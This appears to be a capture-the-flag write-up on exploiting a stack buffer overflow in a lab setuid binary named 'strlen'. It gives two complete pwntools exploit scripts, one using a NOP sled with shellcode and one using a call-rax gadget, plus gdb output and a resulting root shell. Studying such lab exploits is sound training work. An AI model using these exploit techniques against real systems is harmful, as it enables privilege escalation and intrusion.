  • What NOP (\x90) does: NOP is a no-operation instruction; the CPU simply moves on to the next instruction.

  • Sled layout: a long run of NOP instructions is placed before the shellcode, forming a "slide".

  • Why the slide is needed

    1. No need to hit an exact address: as long as RIP lands anywhere in the NOP sled, the CPU executes NOPs until it slides into the shellcode.
    2. Resisting small address shifts: even with ASLR disabled in a test environment, stack addresses can shift slightly between the debugger and a real run or with different input, and the NOP sled raises the success rate.

The script is as follows

from pwn import *
import sys

context(arch='amd64', os='linux', log_level='info')

# 1. Generate the shellcode
shellcode = asm(shellcraft.sh())

# 2. Compute the padding length
offset = 264
nop_padding = b'\x90' * (offset - len(shellcode))

# 3. Shellcode address (needs a leak or a known fixed address)
rip = b"B" * 6  # six B's as a debug marker

# 4. Build the payload
payload = flat(
    nop_padding,
    shellcode,
    rip  # overwrite the return address with the shellcode address
)

# Send the payload
#io = process(["/opt/projects/strlen", payload])
#io.interactive()
# Write to stdout (binary mode)
sys.stdout.buffer.write(payload)

Running gdb again, the crash lands at exactly 0x424242424242 (the B string), which shows RIP was successfully overwritten.

gato@hell:/tmp$ gdb -q /opt/projects/strlen
Reading symbols from /opt/projects/strlen...
(No debugging symbols found in /opt/projects/strlen)
gdb-peda$ run $(python3 a.py)
Starting program: /opt/projects/strlen $(python3 a.py)
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

█▀ ▀█▀ █▀█ █  █▀▀ █▄ █
▄█  █  █▀▄ █▄▄ ██▄ █ ▀█

[*] String: jhH/bin///sPHhri4$1V^HVH1j;XBBBBBB

[+] Length: 270


Program received signal SIGSEGV, Segmentation fault.
Warning: 'set logging off', an alias for the command 'set logging enabled', is deprecated.
Use 'set logging enabled off'.

Warning: 'set logging on', an alias for the command 'set logging enabled', is deprecated.
Use 'set logging enabled on'.
[----------------------------------registers-----------------------------------]
RAX: 0x7fffffffe2b0 --> 0x9090909090909090
RBX: 0x0
RCX: 0x7fffffffe850 --> 0x3d4c4c4548530042 ('B')
RDX: 0x7fffffffe3bd --> 0xffffffe4e8000042
RSI: 0xd ('\r')
RDI: 0x7fffffffe2b0 --> 0x9090909090909090
RBP: 0x50f583b6ad231e6
RSP: 0x7fffffffe3c0 --> 0x7fffffffe4e8 --> 0x7fffffffe72e ("/opt/projects/strlen")
RIP: 0x424242424242 ('BBBBBB')
R8 : 0x0
R9 : 0x9090909090909090
R10: 0x7ffff7d96db8 --> 0xf001a00004252
R11: 0x7ffff7f16010 (<__strcpy_ssse3>: endbr64)
R12: 0x7fffffffe4e8 --> 0x7fffffffe72e ("/opt/projects/strlen")
R13: 0x4011b6 (<main>: endbr64)
R14: 0x403220 --> 0x401180 (<__do_global_dtors_aux>: endbr64)
R15: 0x7ffff7ffd040 --> 0x7ffff7ffe2e0 --> 0x0
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x424242424242
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe3c0 --> 0x7fffffffe4e8 --> 0x7fffffffe72e ("/opt/projects/strlen")
0008| 0x7fffffffe3c8 --> 0x200000000
0016| 0x7fffffffe3d0 --> 0x2
0024| 0x7fffffffe3d8 --> 0x7ffff7db5d90 (<__libc_start_call_main+128>: mov edi,eax)
0032| 0x7fffffffe3e0 --> 0x0
0040| 0x7fffffffe3e8 --> 0x4011b6 (<main>: endbr64)
0048| 0x7fffffffe3f0 --> 0x200000000
0056| 0x7fffffffe3f8 --> 0x7fffffffe4e8 --> 0x7fffffffe72e ("/opt/projects/strlen")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0000424242424242 in ?? ()
gdb-peda$ x/250wx $rsp
0x7fffffffe3c0: 0xffffe4e8 0x00007fff 0x00000000 0x00000002
0x7fffffffe3d0: 0x00000002 0x00000000 0xf7db5d90 0x00007fff
0x7fffffffe3e0: 0x00000000 0x00000000 0x004011b6 0x00000000
0x7fffffffe3f0: 0x00000000 0x00000002 0xffffe4e8 0x00007fff
0x7fffffffe400: 0x00000000 0x00000000 0xe632ff11 0x04fb881e
0x7fffffffe410: 0xffffe4e8 0x00007fff 0x004011b6 0x00000000
0x7fffffffe420: 0x00403220 0x00000000 0xf7ffd040 0x00007fff
0x7fffffffe430: 0x21f6ff11 0xfb0477e1 0x5cbeff11 0xfb0467a8
0x7fffffffe440: 0x00000000 0x00007fff 0x00000000 0x00000000
0x7fffffffe450: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe460: 0x00000000 0x00000000 0x613f5100 0xc700095f
0x7fffffffe470: 0x00000000 0x00000000 0xf7db5e40 0x00007fff
0x7fffffffe480: 0xffffe500 0x00007fff 0x00403220 0x00000000
0x7fffffffe490: 0xf7ffe2e0 0x00007fff 0x00000000 0x00000000
0x7fffffffe4a0: 0x00000000 0x00000000 0x004010d0 0x00000000
0x7fffffffe4b0: 0xffffe4e0 0x00007fff 0x00000000 0x00000000
0x7fffffffe4c0: 0x00000000 0x00000000 0x004010f5 0x00000000
0x7fffffffe4d0: 0xffffe4d8 0x00007fff 0x0000001c 0x00000000
0x7fffffffe4e0: 0x00000002 0x00000000 0xffffe72e 0x00007fff
0x7fffffffe4f0: 0xffffe743 0x00007fff 0x00000000 0x00000000
0x7fffffffe500: 0xffffe852 0x00007fff 0xffffe862 0x00007fff
0x7fffffffe510: 0xffffe870 0x00007fff 0xffffe8a4 0x00007fff
0x7fffffffe520: 0xffffe8b4 0x00007fff 0xffffe8bd 0x00007fff
0x7fffffffe530: 0xffffe8ca 0x00007fff 0xffffe8d9 0x00007fff
0x7fffffffe540: 0xffffe8e2 0x00007fff 0xffffe8f2 0x00007fff
0x7fffffffe550: 0xffffe8ff 0x00007fff 0xffffeeee 0x00007fff
0x7fffffffe560: 0xffffeef9 0x00007fff 0xffffef1b 0x00007fff
0x7fffffffe570: 0xffffef30 0x00007fff 0xffffef50 0x00007fff
0x7fffffffe580: 0xffffef5a 0x00007fff 0xffffef62 0x00007fff
0x7fffffffe590: 0xffffefae 0x00007fff 0xffffefbc 0x00007fff
0x7fffffffe5a0: 0xffffefd0 0x00007fff 0x00000000 0x00000000
0x7fffffffe5b0: 0x00000021 0x00000000 0xf7fc1000 0x00007fff
0x7fffffffe5c0: 0x00000033 0x00000000 0x000005a0 0x00000000
0x7fffffffe5d0: 0x00000010 0x00000000 0x178bfbff 0x00000000
0x7fffffffe5e0: 0x00000006 0x00000000 0x00001000 0x00000000
0x7fffffffe5f0: 0x00000011 0x00000000 0x00000064 0x00000000
0x7fffffffe600: 0x00000003 0x00000000 0x00400040 0x00000000
0x7fffffffe610: 0x00000004 0x00000000 0x00000038 0x00000000
0x7fffffffe620: 0x00000005 0x00000000 0x0000000c 0x00000000
0x7fffffffe630: 0x00000007 0x00000000 0xf7fc3000 0x00007fff
0x7fffffffe640: 0x00000008 0x00000000 0x00000000 0x00000000
0x7fffffffe650: 0x00000009 0x00000000 0x004010d0 0x00000000
0x7fffffffe660: 0x0000000b 0x00000000 0x000003e8 0x00000000
0x7fffffffe670: 0x0000000c 0x00000000 0x000003e8 0x00000000
0x7fffffffe680: 0x0000000d 0x00000000 0x000003e8 0x00000000
0x7fffffffe690: 0x0000000e 0x00000000 0x000003e8 0x00000000
0x7fffffffe6a0: 0x00000017 0x00000000 0x00000001 0x00000000
0x7fffffffe6b0: 0x00000019 0x00000000 0xffffe709 0x00007fff
0x7fffffffe6c0: 0x0000001a 0x00000000 0x00000002 0x00000000
0x7fffffffe6d0: 0x0000001f 0x00000000 0xffffefe3 0x00007fff
0x7fffffffe6e0: 0x0000000f 0x00000000 0xffffe719 0x00007fff
0x7fffffffe6f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe700: 0x00000000 0x00000000 0x3f51ec00 0x00095f61
0x7fffffffe710: 0x0f731bc7 0x88827dc4 0x3638787f 0x0034365f
0x7fffffffe720: 0x00000000 0x00000000 0x00000000 0x6f2f0000
0x7fffffffe730: 0x702f7470 0x656a6f72 0x2f737463 0x6c727473
0x7fffffffe740: 0x90006e65 0x90909090 0x90909090 0x90909090
0x7fffffffe750: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe760: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe770: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe780: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe790: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe7a0: 0x90909090 0x90909090
gdb-peda$ q

Pick any address that contains \x90 as the address RIP jumps to.

I use 0x7fffffffe750 here.

Since the rip value unavoidably contains \x00 (null bytes), the payload is passed to strlen directly via standard output.

In Python 3 the strings must be converted to bytes, using the correct escape sequences:

import sys; sys.stdout.buffer.write(b"nop_padding" + b"shellcode"+b"rip")

The final payload is as follows

from pwn import *
import sys

context(arch='amd64', os='linux', log_level='info')

# 1. Generate the shellcode
shellcode = asm(shellcraft.sh())

# 2. Compute the padding length
offset = 264
nop_padding = b'\x90' * (offset - len(shellcode))

# 3. Shellcode address (needs a leak or a known fixed address)
rip = 0x7fffffffe750

# 4. Build the payload
payload = flat(
    nop_padding,
    shellcode,
    p64(rip)  # overwrite the return address with the shellcode address
)

# Send the payload
#io = process(["/opt/projects/strlen", payload])
#io.interactive()
# Write to stdout (binary mode)
sys.stdout.buffer.write(payload)

pwntools is already installed on the target.

Try running it

gato@hell:/tmp$ /opt/projects/strlen $(python3 a.py)
bash: warning: command substitution: ignored null byte in input

█▀ ▀█▀ █▀█ █  █▀▀ █▄ █
▄█  █  █▀▄ █▄▄ ██▄ █ ▀█

[*] String: jhH/bin///sPHhri4$1V^HVH1j;XP

[+] Length: 270

# id
uid=0(root) gid=1000(gato) groups=1000(gato)
# cat /root/*
cat: /root/containers: Is a directory

█▀█ █▀█ █▀█ ▀█▀   █ █ █▀▀ █  █
█▀▄ █▄█ █▄█  █    █▀█ ██▄ █▄▄ █▄▄

Flag 11: HELL{0V3RF10W_F0R_B3G1NN3R5}

Congratulations on completing this CTF!


- Do you want to tell me what you thought or if you would add/change anything?
- Do you want to support me by following me on the networks?
- Have you found any unexpected route?

Contact me through the following links:

Github: https://github.com/GatoGamer1155
Twitter: https://twitter.com/GatoGamer1155
YouTube: https://www.youtube.com/@GatoGamer1155
Discord: https://discord.com/users/866396648691597374
Instagram: https://www.instagram.com/GatoGamer1155

Strategy two

The ROP chain is **shellcode + padding + call_rax**

Use ROPgadget to find call rax

❯ ROPgadget --binary strlen | grep ": call rax"
0x0000000000401014 : call rax

Write the script with pwntools

from pwn import *

# ------------------ Config ------------------
context(arch='amd64', os='linux', log_level='info')

offset = 264

# ------------------ Generate null-free shellcode ------------------
shellcode = asm(shellcraft.sh())

# ------------------ Build the payload ---------------------------
# Compute the padding length (so the return address is reached)
padding_length = offset - len(shellcode)

payload = flat(
    shellcode,
    b'A' * padding_length,
    b'\x14\x10\x40'  # call rax address, contains no null bytes
)

# ------------------ Run -----------------------------
io = process(["/opt/projects/strlen", payload])
io.interactive()

Just run it directly

gato@hell:/tmp$ python3 exp.py
[+] Starting local process '/opt/projects/strlen': pid 1453
[*] Switching to interactive mode

█▀ ▀█▀ █▀█ █  █▀▀ █▄ █
▄█  █  █▀▄ █▄▄ ██▄ █ ▀█

[*] String: jhH\xb8/bin///sPH\x89\xe7hri\x814$1\xf6V^H\xe6VH\x89\xe61\xd2j;X\x0fAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x14@

[+] Length: 267

$ id
uid=0(root) gid=1000(gato) groups=1000(gato)
$ cat /root/*
cat: /root/containers: Is a directory

█▀█ █▀█ █▀█ ▀█▀   █ █ █▀▀ █  █
█▀▄ █▄█ █▄█  █    █▀█ ██▄ █▄▄ █▄▄

Flag 11: HELL{0V3RF10W_F0R_B3G1NN3R5}

Congratulations on completing this CTF!


- Do you want to tell me what you thought or if you would add/change anything?
- Do you want to support me by following me on the networks?
- Have you found any unexpected route?

Contact me through the following links:

Github: https://github.com/GatoGamer1155
Twitter: https://twitter.com/GatoGamer1155
YouTube: https://www.youtube.com/@GatoGamer1155
Discord: https://discord.com/users/866396648691597374
Instagram: https://www.instagram.com/GatoGamer1155